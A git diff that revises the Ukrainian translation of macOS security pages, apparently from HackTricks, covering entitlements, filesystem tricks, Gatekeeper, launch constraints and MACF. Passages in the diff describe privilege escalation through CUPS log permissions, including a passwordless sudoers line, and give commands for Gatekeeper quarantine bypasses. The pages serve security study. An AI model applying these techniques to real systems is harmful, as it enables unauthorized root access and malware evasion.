### **`system.install.apple-software`** та **`system.install.apple-software.standar-user`**
@ -50,15 +50,15 @@
### `com.apple.private.security.kext-management`
Право доступу, необхідне для запиту **ядра на завантаження розширення ядра**.
Права доступу, необхідні для запиту **ядра на завантаження розширення ядра**.
### **`com.apple.private.icloud-account-access`**
Право доступу **`com.apple.private.icloud-account-access`** дозволяє спілкуватися з **`com.apple.iCloudHelper`** XPC сервісом, який надасть **токени iCloud**.
Права доступу **`com.apple.private.icloud-account-access`** дозволяють спілкуватися з **`com.apple.iCloudHelper`** XPC сервісом, який надасть **токени iCloud**.
**iMovie** та **Garageband** мали це право доступу.
**iMovie** та **Garageband** мали ці права доступу.
Для отримання більшої **інформації** про експлойт для **отримання токенів iCloud** з цього права доступу перевірте доповідь: [**#OBTS v5.0: "Що відбувається на вашому Mac, залишається в iCloud Apple?!" - Войцех Регула**](https://www.youtube.com/watch?v=_6e2LhmxVc0)
Для отримання більшої **інформації** про експлойт для **отримання токенів iCloud** з цих прав доступу перевірте доповідь: [**#OBTS v5.0: "Що відбувається на вашому Mac, залишається в iCloud Apple?!" - Войцех Регула**](https://www.youtube.com/watch?v=_6e2LhmxVc0)
### `com.apple.private.tcc.manager.check-by-audit-token`
@ -74,7 +74,7 @@ TODO: У [**цьому звіті**](https://jhftss.github.io/The-Nightmare-of-A
### `keychain-access-groups`
Це право доступу містить **групи ключів**, до яких має доступ додаток:
Ці права доступу перераховують **групи ключів**, до яких має доступ додаток:
```xml
<key>keychain-access-groups</key>
<array>
@ -87,11 +87,11 @@ TODO: У [**цьому звіті**](https://jhftss.github.io/The-Nightmare-of-A
```
### **`kTCCServiceSystemPolicyAllFiles`**
Надає **Повний доступ до диска**, одне з найвищих дозволів TCC, які ви можете мати.
Надає **Повний доступ до диска** дозволи, одне з найвищих дозволів TCC, які ви можете мати.
### **`kTCCServiceAppleEvents`**
Дозволяє додатку надсилати події іншим додаткам, які зазвичай використовуються для **автоматизації завдань**. Контролюючи інші додатки, він може зловживати дозволами, наданими цим іншим додаткам.
Дозволяє додатку надсилати події іншим додаткам, які зазвичай використовуються для **автоматизації завдань**. Контролюючи інші додатки, він може зловживати дозволами, наданими цими іншими додатками.
Наприклад, змушуючи їх запитувати у користувача його пароль:
```bash

20
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md
View File

@ -9,15 +9,15 @@
- **читання** - ви можете **перерахувати** записи каталогу
- **запис** - ви можете **видаляти/записувати** **файли** в каталозі і ви можете **видаляти порожні папки**.
- Але ви **не можете видаляти/модифікувати непорожні папки**, якщо у вас немає прав на запис.
- Ви **не можете змінювати назву папки**, якщо ви не є її власником.
- Ви **не можете змінити назву папки**, якщо ви не є її власником.
- **виконання** - вам **дозволено проходити** через каталог - якщо у вас немає цього права, ви не можете отримати доступ до жодних файлів всередині, або в будь-яких підкаталогах.
### Небезпечні комбінації
**Як перезаписати файл/папку, що належить root**, але:
- Один батьківський **власник каталогу** в шляху є користувачем
- Один батьківський **власник каталогу** в шляху є **групою користувачів** з **доступом на запис**
- Один з батьківських **власників каталогу** в шляху є користувачем
- Один з батьківських **власників каталогу** в шляху є **групою користувачів** з **доступом на запис**
- Група користувачів має **доступ на запис** до **файлу**
З будь-якою з попередніх комбінацій, зловмисник може **впровадити** **символічне/жорстке посилання** на очікуваний шлях, щоб отримати привілейований довільний запис.
@ -36,7 +36,7 @@
Перевірте в інших розділах, де зловмисник може **зловживати довільним записом для ескалації привілеїв**.
### Відкрити `O_NOFOLLOW`
### Відкритий `O_NOFOLLOW`
Флаг `O_NOFOLLOW`, коли використовується функцією `open`, не буде слідувати за символічним посиланням в останньому компоненті шляху, але буде слідувати за рештою шляху. Правильний спосіб запобігти слідуванню за символічними посиланнями в шляху - це використання флага `O_NOFOLLOW_ANY`.
@ -173,7 +173,7 @@ csops(pid, 9, &status, 4); // CS_OPS_SET_STATUS
status = SecTaskGetCodeSignStatus(SecTaskCreateFromSelf(0));
NSLog(@"=====Inject successfully into %d(%@), csflags=0x%x", pid, exePath, status);
```
## Обхід підписів коду
## Обхід кодових підписів
Пакунки містять файл **`_CodeSignature/CodeResources`**, який містить **хеш** кожного окремого **файлу** в **пакунку**. Зверніть увагу, що хеш CodeResources також **вбудований в виконуваний файл**, тому ми не можемо з цим нічого зробити.
@ -253,11 +253,11 @@ hdiutil create -srcfolder justsome.app justsome.dmg
## Произвольні записи
### Періодичні sh скрипти
### Періодичні sh-скрипти
Якщо ваш скрипт може бути інтерпретований як **shell script**, ви можете перезаписати **`/etc/periodic/daily/999.local`** shell-скрипт, який буде запускатися щодня.
Ви можете **підробити** виконання цього скрипта за допомогою: **`sudo periodic daily`**
Ви можете **сфальсифікувати** виконання цього скрипта за допомогою: **`sudo periodic daily`**
### Демони
@ -302,7 +302,7 @@ LogFilePerm 777
```
Це створить файл `/etc/sudoers.d/lpe` з правами 777. Додатковий сміття в кінці потрібно для створення журналу помилок.
Потім запишіть у `/etc/sudoers.d/lpe` необхідну конфігурацію для ескалації привілеїв, наприклад, `%staff ALL=(ALL) NOPASSWD:ALL`.
Потім запишіть у `/etc/sudoers.d/lpe` необхідну конфігурацію для підвищення привілеїв, наприклад, `%staff ALL=(ALL) NOPASSWD:ALL`.
Потім знову змініть файл `/etc/cups/cups-files.conf`, вказавши `LogFilePerm 700`, щоб новий файл sudoers став дійсним, викликавши `cupsctl`.
@ -420,11 +420,11 @@ return 0;
```
</details>
## macOS Захищені дескриптори
## macOS Захищені Дескриптори
**macOS захищені дескриптори** - це функція безпеки, введена в macOS для підвищення безпеки та надійності **операцій з дескрипторами файлів** у користувацьких додатках. Ці захищені дескриптори забезпечують спосіб асоціювання специфічних обмежень або "захисників" з дескрипторами файлів, які забезпечуються ядром.
Ця функція особливо корисна для запобігання певним класам вразливостей безпеки, таким як **несанкціонований доступ до файлів** або **умови гонки**. Ці вразливості виникають, коли, наприклад, один потік отримує доступ до дескриптора файлу, надаючи **іншому вразливому потоку доступ до нього** або коли дескриптор файлу **успадковується** вразливим дочірнім процесом. Деякі функції, пов'язані з цією функціональністю, включають:
Ця функція особливо корисна для запобігання певним класам вразливостей безпеки, таким як **несанкціонований доступ до файлів** або **умови гонки**. Ці вразливості виникають, коли, наприклад, один потік отримує доступ до опису файлу, надаючи **іншому вразливому потоку доступ до нього** або коли дескриптор файлу **успадковується** вразливим дочірнім процесом. Деякі функції, пов'язані з цією функціональністю, включають:
- `guarded_open_np`: Відкриває FD з захисником
- `guarded_close_np`: Закриває його

38
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md
View File

@ -8,7 +8,7 @@
Ключовий механізм Gatekeeper полягає в її **процесі перевірки**. Вона перевіряє, чи підписане завантажене програмне забезпечення **визнаним розробником**, що забезпечує автентичність програмного забезпечення. Додатково, вона підтверджує, чи програмне забезпечення **нотаризоване Apple**, що підтверджує, що воно не містить відомого шкідливого вмісту і не було змінено після нотаризації.
Крім того, Gatekeeper посилює контроль і безпеку користувача, **запитуючи користувачів підтвердити відкриття** завантаженого програмного забезпечення вперше. Ця запобіжна міра допомагає запобігти випадковому запуску потенційно шкідливого виконуваного коду, який користувач міг помилково прийняти за безпечний файл даних.
Крім того, Gatekeeper посилює контроль користувача та безпеку, **запитуючи користувачів підтвердити відкриття** завантаженого програмного забезпечення вперше. Ця запобіжна міра допомагає запобігти випадковому запуску потенційно шкідливого виконуваного коду, який користувач міг помилково прийняти за безпечний файл даних.
### Application Signatures
@ -16,17 +16,17 @@
Ось як це працює:
1. **Підписання додатку:** Коли розробник готовий розповсюдити свій додаток, він **підписує додаток за допомогою приватного ключа**. Цей приватний ключ пов'язаний з **сертифікатом, який Apple видає розробнику** під час його реєстрації в програмі Apple Developer Program. Процес підписання включає створення криптографічного хешу всіх частин додатку та шифрування цього хешу за допомогою приватного ключа розробника.
2. **Розповсюдження додатку:** Підписаний додаток потім розповсюджується користувачам разом із сертифікатом розробника, який містить відповідний публічний ключ.
3. **Перевірка додатку:** Коли користувач завантажує та намагається запустити додаток, його операційна система Mac використовує публічний ключ з сертифіката розробника для розшифрування хешу. Потім вона повторно обчислює хеш на основі поточного стану додатку та порівнює його з розшифрованим хешем. Якщо вони збігаються, це означає, що **додаток не був змінений** з моменту його підписання розробником, і система дозволяє запуск додатку.
1. **Підписання додатка:** Коли розробник готовий розповсюдити свій додаток, він **підписує додаток за допомогою приватного ключа**. Цей приватний ключ пов'язаний з **сертифікатом, який Apple видає розробнику** під час його реєстрації в програмі Apple Developer Program. Процес підписання включає створення криптографічного хешу всіх частин додатка та шифрування цього хешу за допомогою приватного ключа розробника.
2. **Розповсюдження додатка:** Підписаний додаток потім розповсюджується користувачам разом із сертифікатом розробника, який містить відповідний публічний ключ.
3. **Перевірка додатка:** Коли користувач завантажує та намагається запустити додаток, його операційна система Mac використовує публічний ключ з сертифіката розробника для розшифрування хешу. Потім вона повторно обчислює хеш на основі поточного стану додатка та порівнює його з розшифрованим хешем. Якщо вони збігаються, це означає, що **додаток не був змінений** з моменту його підписання розробником, і система дозволяє запуск додатка.
Підписи додатків є важливою частиною технології Gatekeeper Apple. Коли користувач намагається **відкрити додаток, завантажений з Інтернету**, Gatekeeper перевіряє підпис додатку. Якщо він підписаний сертифікатом, виданим Apple відомому розробнику, і код не був змінений, Gatekeeper дозволяє запуск додатку. В іншому випадку, він блокує додаток і сповіщає користувача.
Підписи додатків є важливою частиною технології Gatekeeper Apple. Коли користувач намагається **відкрити додаток, завантажений з Інтернету**, Gatekeeper перевіряє підпис додатка. Якщо він підписаний сертифікатом, виданим Apple відомому розробнику, і код не був змінений, Gatekeeper дозволяє запуск додатка. В іншому випадку, він блокує додаток і сповіщає користувача.
Починаючи з macOS Catalina, **Gatekeeper також перевіряє, чи був додаток нотаризований** Apple, додаючи додатковий рівень безпеки. Процес нотаризації перевіряє додаток на наявність відомих проблем безпеки та шкідливого коду, і якщо ці перевірки проходять, Apple додає квиток до додатку, який може перевірити Gatekeeper.
Починаючи з macOS Catalina, **Gatekeeper також перевіряє, чи був додаток нотаризований** Apple, додаючи додатковий рівень безпеки. Процес нотаризації перевіряє додаток на наявність відомих проблем безпеки та шкідливого коду, і якщо ці перевірки проходять, Apple додає квиток до додатка, який може перевірити Gatekeeper.
#### Check Signatures
При перевірці деякого **зразка шкідливого ПЗ** ви завжди повинні **перевіряти підпис** бінарного файлу, оскільки **розробник**, який його підписав, може вже бути **пов'язаний** з **шкідливим ПЗ.**
При перевірці деякого **зразка шкідливого ПЗ** ви завжди повинні **перевіряти підпис** бінарного файлу, оскільки **розробник**, який його підписав, може вже бути **пов'язаний** зі **шкідливим ПЗ.**
```bash
# Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -45,16 +45,16 @@ codesign -s <cert-name-keychain> toolsdemo
```
### Нотаризація
Процес нотаризації Apple слугує додатковим захистом для користувачів від потенційно шкідливого програмного забезпечення. Він передбачає **подання розробником свого додатку на перевірку** до **Служби нотаризації Apple**, яку не слід плутати з перевіркою додатків. Ця служба є **автоматизованою системою**, яка ретельно перевіряє подане програмне забезпечення на наявність **шкідливого контенту** та будь-яких потенційних проблем з підписуванням коду.
Процес нотаризації Apple слугує додатковим захистом для користувачів від потенційно шкідливого програмного забезпечення. Він передбачає, що **розробник подає свою програму на перевірку** до **Служби нотаризації Apple**, яку не слід плутати з перевіркою додатків. Ця служба є **автоматизованою системою**, яка ретельно перевіряє подане програмне забезпечення на наявність **шкідливого контенту** та будь-яких потенційних проблем з підписуванням коду.
Якщо програмне забезпечення **проходить** цю перевірку без жодних зауважень, Служба нотаризації генерує квиток нотаризації. Розробник зобов'язаний **додати цей квиток до свого програмного забезпечення**, процес, відомий як 'стаплінг'. Крім того, квиток нотаризації також публікується в Інтернеті, де Gatekeeper, технологія безпеки Apple, може отримати до нього доступ.
Під час першої установки або виконання програмного забезпечення користувачем, наявність квитка нотаризації - чи то прикріпленого до виконуваного файлу, чи знайденого в Інтернеті - **інформує Gatekeeper, що програмне забезпечення було нотаризовано Apple**. В результаті Gatekeeper відображає описове повідомлення в початковому діалоговому вікні запуску, вказуючи на те, що програмне забезпечення пройшло перевірки на наявність шкідливого контенту від Apple. Цей процес таким чином підвищує довіру користувачів до безпеки програмного забезпечення, яке вони встановлюють або запускають на своїх системах.
Під час першої установки або виконання програмного забезпечення користувачем, наявність квитка нотаризації - чи то прикріпленого до виконуваного файлу, чи знайденого в Інтернеті - **інформує Gatekeeper, що програмне забезпечення було нотаризовано Apple**. В результаті Gatekeeper відображає описове повідомлення в початковому діалоговому вікні запуску, вказуючи на те, що програмне забезпечення пройшло перевірку на наявність шкідливого контенту від Apple. Цей процес таким чином підвищує довіру користувачів до безпеки програмного забезпечення, яке вони встановлюють або запускають на своїх системах.
### spctl & syspolicyd
> [!CAUTION]
> Зверніть увагу, що з версії Sequoia, **`spctl`** більше не дозволяє змінювати конфігурацію Gatekeeper.
> Зверніть увагу, що з версії Sequoia **`spctl`** більше не дозволяє змінювати конфігурацію Gatekeeper.
**`spctl`** - це інструмент CLI для перерахунку та взаємодії з Gatekeeper (через демон `syspolicyd` за допомогою повідомлень XPC). Наприклад, можна побачити **статус** GateKeeper за допомогою:
```bash
@ -84,9 +84,9 @@ anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists
anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID
[...]
```
**`syspolicyd`** також надає XPC сервер з різними операціями, такими як `assess`, `update`, `record` та `cancel`, які також доступні за допомогою **`Security.framework`'s `SecAssessment*`** API, а **`xpctl`** насправді спілкується з **`syspolicyd`** через XPC.
**`syspolicyd`** також надає XPC сервер з різними операціями, такими як `assess`, `update`, `record` та `cancel`, які також доступні через **`Security.framework`'s `SecAssessment*`** API, а **`xpctl`** насправді спілкується з **`syspolicyd`** через XPC.
Зверніть увагу, що перше правило закінчується на "**App Store**", а друге на "**Developer ID**", і що в попередньому зображенні було **дозволено виконувати програми з App Store та ідентифікованих розробників**.\
Зверніть увагу, що перше правило закінчується на "**App Store**", а друге на "**Developer ID**", і що в попередньому зображенні було **дозволено виконувати програми з App Store та від ідентифікованих розробників**.\
Якщо ви **зміните** це налаштування на App Store, то правила "**Notarized Developer ID" зникнуть**.
Існує також тисячі правил **типу GKE**:
@ -158,7 +158,7 @@ spctl --assess -v /Applications/App.app
> [!WARNING]
> Цей атрибут повинен бути **встановлений програмою, що створює/завантажує** файл.
>
> Однак файли, які знаходяться в пісочниці, матимуть цей атрибут, встановлений для кожного файлу, який вони створюють. А програми без пісочниці можуть встановлювати його самостійно або вказати ключ [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) у **Info.plist**, що змусить систему встановити розширений атрибут `com.apple.quarantine` на створені файли,
> Однак файли, які знаходяться в пісочниці, матимуть цей атрибут, встановлений для кожного файлу, який вони створюють. А програми без пісочниці можуть встановити його самостійно або вказати ключ [**LSFileQuarantineEnabled**](https://developer.apple.com/documentation/bundleresources/information_property_list/lsfilequarantineenabled?language=objc) у **Info.plist**, що змусить систему встановити розширений атрибут `com.apple.quarantine` на створені файли,
Більше того, всі файли, створені процесом, що викликає **`qtn_proc_apply_to_self`**, підлягають карантину. Або API **`qtn_file_apply_to_path`** додає атрибут карантину до вказаного шляху файлу.
@ -275,7 +275,7 @@ find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; pri
Ця бібліотека експортує кілька функцій, які дозволяють маніпулювати полями розширених атрибутів.
API `qtn_file_*` стосуються політик карантину файлів, API `qtn_proc_*` застосовуються до процесів (файлів, створених процесом). Неекспортовані функції `__qtn_syscall_quarantine*` є тими, які застосовують політики, які викликають `mac_syscall` з "Quarantine" як першим аргументом, що надсилає запити до `Quarantine.kext`.
API `qtn_file_*` стосуються політик карантину файлів, API `qtn_proc_*` застосовуються до процесів (файлів, створених процесом). Невиведені функції `__qtn_syscall_quarantine*` є тими, які застосовують політики, які викликають `mac_syscall` з "Quarantine" як першим аргументом, що надсилає запити до `Quarantine.kext`.
#### **Quarantine.kext**
@ -286,7 +286,7 @@ API `qtn_file_*` стосуються політик карантину файл
Він також використовує кілька MIB:
- `security.mac.qtn.sandbox_enforce`: Застосування карантину разом із Sandbox
- `security.mac.qtn.user_approved_exec`: Карантинні процеси можуть виконувати лише затверджені файли
- `security.mac.qtn.user_approved_exec`: Карантиновані процеси можуть виконувати лише затверджені файли
### XProtect
@ -340,7 +340,7 @@ XProtect розташований у захищеному місці SIP за а
### [CVE-2022-22616](https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/)
У цьому обході був створений zip-файл з додатком, який починався з компресії з `application.app/Contents`, а не з `application.app`. Отже, **атрибут карантину** був застосований до всіх **файлів з `application.app/Contents`**, але **не до `application.app`**, що перевіряв Gatekeeper, тому Gatekeeper був обійдений, оскільки, коли `application.app` був активований, він **не мав атрибута карантину.**
У цьому обході був створений zip-файл з додатком, який починався з компресії з `application.app/Contents`, а не з `application.app`. Отже, **атрибут карантину** був застосований до всіх **файлів з `application.app/Contents`**, але **не до `application.app`**, що перевіряв Gatekeeper, тому Gatekeeper був обійдений, оскільки коли `application.app` був активований, він **не мав атрибута карантину.**
```bash
zip -r test.app/Contents test.zip
```
@ -365,7 +365,7 @@ xattr: [Errno 13] Permission denied: '/tmp/no-attr'
```
Крім того, формат файлу **AppleDouble** копіює файл, включаючи його ACE.
У [**джерельному коді**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) можна побачити, що текстове представлення ACL, збережене всередині xattr під назвою **`com.apple.acl.text`**, буде встановлено як ACL у розпакованому файлі. Отже, якщо ви стиснули додаток у zip-файл з форматом файлу **AppleDouble** з ACL, який заважає запису інших xattrs... xattr карантину не було встановлено в додатку:
У [**джерельному коді**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html) можна побачити, що текстове представлення ACL, збережене всередині xattr під назвою **`com.apple.acl.text`**, буде встановлено як ACL у розпакованому файлі. Отже, якщо ви стиснули додаток у zip-файл з форматом файлу **AppleDouble** з ACL, який заважає запису інших xattrs у нього... xattr карантину не було встановлено в додатку:
```bash
chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
@ -387,7 +387,7 @@ aa archive -d app -o test.aar
### [CVE-2023-27951](https://redcanary.com/blog/gatekeeper-bypass-vulnerabilities/)
Формати файлів AppleDouble зберігають атрибути файлу в окремому файлі, що починається з `._`, це допомагає копіювати атрибути файлів **між macOS машинами**. Однак було помічено, що після розпакування файлу AppleDouble, файл, що починається з `._`, **не отримав атрибут карантину**.
Формати файлів AppleDouble зберігають атрибути файлу в окремому файлі, що починається з `._`, це допомагає копіювати атрибути файлів **між машинами macOS**. Однак було помічено, що після розпакування файлу AppleDouble файл, що починається з `._`, **не отримав атрибут карантину**.
```bash
mkdir test
echo a > test/a
@ -397,7 +397,7 @@ aa archive -d test/ -o test.aar
# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute
```
Можливість створити файл, який не матиме атрибуту карантину, дозволила **обійти Gatekeeper.** Трюк полягав у тому, щоб **створити DMG файл додатку** за допомогою конвенції іменування AppleDouble (почати з `._`) і створити **видимий файл як символьне посилання на цей прихований** файл без атрибуту карантину.\
Можливість створити файл, який не матиме атрибуту карантину, дозволила **обійти Gatekeeper.** Трюк полягав у тому, щоб **створити DMG файл додатку** за допомогою конвенції імен AppleDouble (почати з `._`) і створити **видимий файл як символьне посилання на цей прихований** файл без атрибуту карантину.\
Коли **файл dmg виконується**, оскільки він не має атрибуту карантину, він **обійде Gatekeeper.**
```bash
# Create an app bundle with the backdoor an call it app.app

22
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md
View File

@ -4,7 +4,7 @@
## Basic Information
Обмеження запуску в macOS були введені для підвищення безпеки шляхом **регулювання того, як, ким і звідки може бути ініційований процес**. Ініційовані в macOS Ventura, вони надають структуру, яка категоризує **кожен системний бінар у різні категорії обмежень**, які визначені в **кеші довіри**, списку, що містить системні бінари та їх відповідні хеші. Ці обмеження поширюються на кожен виконуваний бінар у системі, що передбачає набір **правил**, які визначають вимоги для **запуску певного бінару**. Правила охоплюють самостійні обмеження, які бінар повинен задовольнити, обмеження батьківського процесу, які повинні бути виконані його батьківським процесом, та відповідальні обмеження, які повинні дотримуватися інші відповідні суб'єкти.
Обмеження запуску в macOS були введені для підвищення безпеки шляхом **регулювання того, як, ким і звідки може бути ініційований процес**. Ініційовані в macOS Ventura, вони надають структуру, яка категоризує **кожен системний бінар у різні категорії обмежень**, які визначені в **кеші довіри**, списку, що містить системні бінари та їх відповідні хеші. Ці обмеження поширюються на кожен виконуваний бінар у системі, що передбачає набір **правил**, які визначають вимоги для **запуску конкретного бінару**. Правила охоплюють самостійні обмеження, які бінар повинен задовольнити, обмеження батьківського процесу, які повинні бути виконані його батьківським процесом, та відповідальні обмеження, які повинні дотримуватись інші відповідні суб'єкти.
Механізм поширюється на сторонні програми через **обмеження середовища**, починаючи з macOS Sonoma, що дозволяє розробникам захищати свої програми, вказуючи **набір ключів і значень для обмежень середовища**.
@ -17,7 +17,7 @@
- **Відповідальні обмеження**: Обмеження, що застосовуються до **процесу, що викликає службу** в комунікації XPC
- **Обмеження завантаження бібліотеки**: Використовуйте обмеження завантаження бібліотеки, щоб вибірково описати код, який може бути завантажений
Отже, коли процес намагається запустити інший процес — викликом `execve(_:_:_:)` або `posix_spawn(_:_:_:_:_:_:)` — операційна система перевіряє, що **виконуваний** файл **задовольняє** своє **власне самостійне обмеження**. Вона також перевіряє, що **виконуваний файл батьківського** **процесу** **задовольняє** **обмеження батька** виконуваного файлу, і що **виконуваний файл відповідального** **процесу** **задовольняє обмеження відповідального процесу** виконуваного файлу. Якщо будь-яке з цих обмежень запуску не задовольняється, операційна система не запускає програму.
Отже, коли процес намагається запустити інший процес — викликом `execve(_:_:_:)` або `posix_spawn(_:_:_:_:_:_:)` — операційна система перевіряє, що **виконуваний** файл **задовольняє** своє **власне самостійне обмеження**. Вона також перевіряє, що **виконуваний файл батьківського** **процесу** **задовольняє** **батьківське обмеження** виконуваного файлу, і що **виконуваний файл відповідального** **процесу** **задовольняє** обмеження відповідального процесу виконуваного файлу. Якщо будь-яке з цих обмежень запуску не задовольняється, операційна система не запускає програму.
Якщо під час завантаження бібліотеки будь-яка частина **обмеження бібліотеки не є істинною**, ваш процес **не завантажує** бібліотеку.
@ -27,19 +27,19 @@ LC складається з **фактів** та **логічних опера
[**Факти, які може використовувати LC, задокументовані**](https://developer.apple.com/documentation/security/defining_launch_environment_and_library_constraints). Наприклад:
- is-init-proc: Булеве значення, яке вказує, чи повинен виконуваний файл бути процесом ініціалізації операційної системи (`launchd`).
- is-sip-protected: Булеве значення, яке вказує, чи повинен виконуваний файл бути файлом, захищеним захистом цілісності системи (SIP).
- `on-authorized-authapfs-volume:` Булеве значення, яке вказує, чи завантажила операційна система виконуваний файл з авторизованого, автентифікованого обсягу APFS.
- `on-authorized-authapfs-volume`: Булеве значення, яке вказує, чи завантажила операційна система виконуваний файл з авторизованого, автентифікованого обсягу APFS.
- is-init-proc: Логічне значення, яке вказує, чи повинен виконуваний файл бути процесом ініціалізації операційної системи (`launchd`).
- is-sip-protected: Логічне значення, яке вказує, чи повинен виконуваний файл бути файлом, захищеним захистом цілісності системи (SIP).
- `on-authorized-authapfs-volume:` Логічне значення, яке вказує, чи завантажила операційна система виконуваний файл з авторизованого, аутентифікованого обсягу APFS.
- `on-authorized-authapfs-volume`: Логічне значення, яке вказує, чи завантажила операційна система виконуваний файл з авторизованого, аутентифікованого обсягу APFS.
- Cryptexes volume
- `on-system-volume:` Булеве значення, яке вказує, чи завантажила операційна система виконуваний файл з обсягу системи, що в даний момент завантажений.
- `on-system-volume:` Логічне значення, яке вказує, чи завантажила операційна система виконуваний файл з обсягу системи, що в даний момент завантажений.
- Всередині /System...
- ...
Коли бінар Apple підписується, він **призначає його категорії LC** всередині **кешу довіри**.
- **LC категорії iOS 16** були [**перевернуті та задокументовані тут**](https://gist.github.com/LinusHenze/4cd5d7ef057a144cda7234e2c247c056).
- Поточні **категорії LC (macOS 14** - Somona) були перевернуті, і їх [**описи можна знайти тут**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53).
- Поточні **категорії LC (macOS 14 - Somona)** були перевернуті, і їх [**описи можна знайти тут**](https://gist.github.com/theevilbit/a6fef1e0397425a334d064f7b6e1be53).
Наприклад, категорія 1 є:
```
@ -58,7 +58,7 @@ Parent Constraint: is-init-proc
## Обмеження середовища
Це обмеження запуску, встановлені в **додатках третіх сторін**. Розробник може вибрати **факти** та **логічні операнди для використання** у своєму додатку, щоб обмежити доступ до нього.
Це обмеження запуску, налаштовані в **додатках третіх сторін**. Розробник може вибрати **факти** та **логічні операнди для використання** у своєму додатку, щоб обмежити доступ до нього.
Можливо перерахувати обмеження середовища додатка за допомогою:
```bash
@ -147,12 +147,12 @@ uint8_t reserved0;
### Захист від демонів XPC
У релізі Sonoma важливим моментом є **конфігурація відповідальності** служби демонів XPC. Служба XPC відповідає за себе, на відміну від підключеного клієнта, який несе відповідальність. Це задокументовано у звіті зворотного зв'язку FB13206884. Ця конфігурація може здаватися недосконалою, оскільки дозволяє певні взаємодії зі службою XPC:
У випуску Sonoma важливим моментом є **конфігурація відповідальності** служби демонів XPC. Служба XPC відповідає за себе, на відміну від підключеного клієнта, який несе відповідальність. Це задокументовано у звіті зворотного зв'язку FB13206884. Ця конфігурація може здаватися недосконалою, оскільки вона дозволяє певні взаємодії зі службою XPC:
- **Запуск служби XPC**: Якщо вважати це помилкою, ця конфігурація не дозволяє ініціювати службу XPC через код зловмисника.
- **Підключення до активної служби**: Якщо служба XPC вже працює (можливо, активована її оригінальним додатком), немає перешкод для підключення до неї.
Хоча впровадження обмежень на службу XPC може бути корисним, **звужуючи вікно для потенційних атак**, це не вирішує основну проблему. Забезпечення безпеки служби XPC вимагає **ефективної валідації підключеного клієнта**. Це залишається єдиним способом зміцнити безпеку служби. Також варто зазначити, що згадана конфігурація відповідальності наразі діє, що може не відповідати запланованому дизайну.
Хоча впровадження обмежень на службу XPC може бути корисним, **звужуючи вікно для потенційних атак**, це не вирішує основну проблему. Забезпечення безпеки служби XPC вимагає **ефективної валідації підключеного клієнта**. Це залишається єдиним способом зміцнити безпеку служби. Також варто зазначити, що згадана конфігурація відповідальності наразі є діючою, що може не відповідати запланованому дизайну.
### Захист Electron

8
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md
View File

@ -100,7 +100,7 @@ MACF ініціалізується дуже швидко. Він налашто
Звичайно, можна знайти виклики до MACF, визначені в коді, такі як: **`#if CONFIG_MAC`** умовні блоки. Більше того, всередині цих блоків можна знайти виклики до `mac_proc_check*`, які викликають MACF для **перевірки дозволів** на виконання певних дій. Крім того, формат викликів MACF є: **`mac_<object>_<opType>_opName`**.
Об'єкт є одним з наступних: `bpfdesc`, `cred`, `file`, `proc`, `vnode`, `mount`, `devfs`, `ifnet`, `inpcb`, `mbuf`, `ipq`, `pipe`, `sysv[msg/msq/shm/sem]`, `posix[shm/sem]`, `socket`, `kext`.\
`opType` зазвичай є check, який буде використовуватися для дозволу або заборони дії. Однак також можливо знайти `notify`, що дозволить kext реагувати на дану дію.
`opType` зазвичай є перевіркою, яка буде використовуватися для дозволу або заборони дії. Однак також можливо знайти `notify`, що дозволить kext реагувати на дану дію.
Ви можете знайти приклад у [https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_mman.c#L621](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/kern/kern_mman.c#L621):
@ -157,7 +157,7 @@ error = mac_error_select(__step_err, error); \
}); \
} while (0)
```
Який пройде через всі зареєстровані політики mac, викликаючи їх функції та зберігаючи вихідні дані в змінній error, яка може бути перевизначена лише `mac_error_select` за кодами успіху, тому якщо будь-яка перевірка не пройде, вся перевірка зазнає невдачі, і дія не буде дозволена.
Який пройде через всі зареєстровані політики mac, викликаючи їх функції та зберігаючи вихідні дані в змінній помилки, яка може бути перевизначена лише `mac_error_select` кодами успіху, тому якщо будь-яка перевірка не вдається, вся перевірка зазнає невдачі, і дія не буде дозволена.
> [!TIP]
> Однак пам'ятайте, що не всі виклики MACF використовуються лише для відмови в діях. Наприклад, `mac_priv_grant` викликає макрос [**MAC_GRANT**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/security/mac_internal.h#L274), який надасть запитувану привілегію, якщо будь-яка політика відповість 0:
@ -168,7 +168,7 @@ error = mac_error_select(__step_err, error); \
> * модулів політики та перевіряючи з кожним, як він ставиться до
> * запиту. На відміну від MAC_CHECK, він надає, якщо будь-які політики повертають '0',
> * і в іншому випадку повертає EPERM. Зверніть увагу, що він повертає своє значення через
> * 'error' в області видимості виклику.
> * 'error' в контексті виклику.
> */
> #define MAC_GRANT(check, args...) do { \
> error = EPERM; \
@ -188,7 +188,7 @@ error = mac_error_select(__step_err, error); \
### priv_check & priv_grant
Ці виклики призначені для перевірки та надання (десятків) **привілеїв**, визначених у [**bsd/sys/priv.h**](https://github.com/apple-oss-distributions/xnu/blob/94d3b452840153a99b38a3a9659680b2a006908e/bsd/sys/priv.h).\
